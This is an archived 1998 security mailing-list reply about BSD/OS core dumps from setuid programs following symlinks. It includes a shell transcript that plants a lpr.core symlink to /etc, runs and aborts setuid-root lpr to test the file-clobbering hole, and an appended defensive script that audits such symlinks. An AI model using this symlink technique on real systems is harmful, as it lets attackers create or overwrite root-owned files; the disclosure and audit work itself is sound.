Re: BSD coredumps follow symlinks

From: Nir Soffer (scorpiosat_private)
Date: Thu Apr 02 1998 - 00:48:46 PST


    On Tue, 31 Mar 1998, Denis Papp wrote:
    
    > I have a system running BSD/OS 2.1 with all the patches from BSDi, including
    > K210-029 which I quote:
    > "This patch addresses a security problem with core dumps from setuid programs."
    >
    
    
    That's very weird. Back when I found the same bug in BSDI 3.0 I tried the
    same in BSDi 2.1 and it didn't work. Maybe we used a different patch, but
    this is the transcript:
    
    jupiter[ /tmp ] uname -a
    BSD/OS jupiter.cs.huji.ac.il 2.1 BSDI BSD/OS 2.1 Kernel #4: Tue Oct  8
    08:49:52 IST 1996     dannyat_private:/sys/compile/CHAMSA  i386
    jupiter[ /tmp ] ls -la lpr.core
    lrwxrwxrwt  1 root  wheel  8 Apr  2 11:37 lpr.core@ -> /etc/BLA
    jupiter[ /tmp ] lpr &
    [1] 29989
    jupiter[ /tmp ]
    [1]  + Suspended (tty input)  lpr
    jupiter[ /tmp ] kill -6 %1
    jupiter[ /tmp ] fg
    lpr
    IOT trap
    jupiter[ /tmp ] ls -la /etc/BLA
    ls: /etc/BLA: No such file or directory
    jupiter[ /tmp ]
    
    
    jupiter[ /tmp ] ls -la `which lpr`
    -rwsr-sr-x  1 root  daemon  26533 Feb 19  1996 /usr/local/bin/lpr*
    jupiter[ /tmp ]
    
    
    lpr will dump core if there is no symlink there. Maybe you failed to
    install the patch correctly?
    
    Regards,
    Nir.
    
     --
    Nir Soffer * scorpiosat_private * http://www.cs.huji.ac.il/~scorpios
    "I wouldn't recommend sex drugs or insanity for everyone but they've
    always worked for me."
                    -- Hunter S. Thompson
    Mail me with the subject 'get pgp key' for my PGP Public key.
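
A defensive check for the condition shown in the transcript, as an added example that is not part of the original post: it lists symlinks named `*.core` in a directory such as /tmp and reports whether each link's target already exists. The function names and the CREATE/OVERWRITE labels are this example's own, and `find -maxdepth` and `readlink` are assumed to be available (they are on current BSD and GNU systems).

```shell
#!/bin/sh
# Added example (not from the original post): list symlinks named *.core in a
# directory and say what a core dump that followed each link would hit.

# audit_core_symlinks DIR
# Prints one line per symlink: "<state> <link> -> <target>"
#   CREATE    target does not exist; a followed dump would create it
#   OVERWRITE target exists; a followed dump would replace its contents
audit_core_symlinks() {
    dir=$1
    # -type l tests the link itself; find does not follow it by default.
    find "$dir" -maxdepth 1 -type l -name '*.core' 2>/dev/null |
    while IFS= read -r link; do
        target=$(readlink "$link")
        # [ -e ] follows the link, so it is true only if the target exists.
        if [ -e "$link" ]; then
            state=OVERWRITE
        else
            state=CREATE
        fi
        printf '%s %s -> %s\n' "$state" "$link" "$target"
    done
}

# count_core_symlinks DIR: number of findings, e.g. for a periodic check.
count_core_symlinks() {
    audit_core_symlinks "$1" | wc -l | tr -d ' '
}

# Run against the directory given on the command line, if any.
if [ $# -gt 0 ]; then
    audit_core_symlinks "$1"
fi
```

Regular files named `*.core` and symlinks with other names are ignored; file names containing newlines are not handled.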
    


